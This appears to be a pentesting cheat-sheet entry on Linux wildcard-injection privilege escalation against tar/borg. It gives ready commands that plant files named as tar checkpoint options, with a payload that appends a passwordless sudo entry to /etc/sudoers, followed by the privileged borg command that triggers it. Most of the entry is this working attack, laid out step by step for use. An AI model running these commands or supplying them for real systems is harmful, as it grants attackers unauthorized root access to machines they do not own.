Wildcard Abuse for PrivEsc (tar/borg)
privesclinuxtool
Summary
Abuses a privileged command that uses a shell wildcard (*) by planting files whose names are interpreted as command-line options, achieving code execution.
Walkthrough
Use this when a root/sudo command runs over a wildcard (e.g. *) in a directory you control. File names become arguments to the command.
Steps
- In the target directory, create files whose names act as options, e.g.
--checkpoint=1and a--checkpoint-action=exec=...payload that adds a sudoers entry. - When the privileged command expands the
*and processes those file names as flags, your injected action executes with the command's privileges.
Commands
bash
touch '--checkpoint=1' touch '--checkpoint-action=exec=sh -c "echo \"username ALL=(ALL) NOPASSWD: ALL\" >> /etc/sudoers"'
bash
sudo /usr/bin/borg extract /path/to/repo::archive *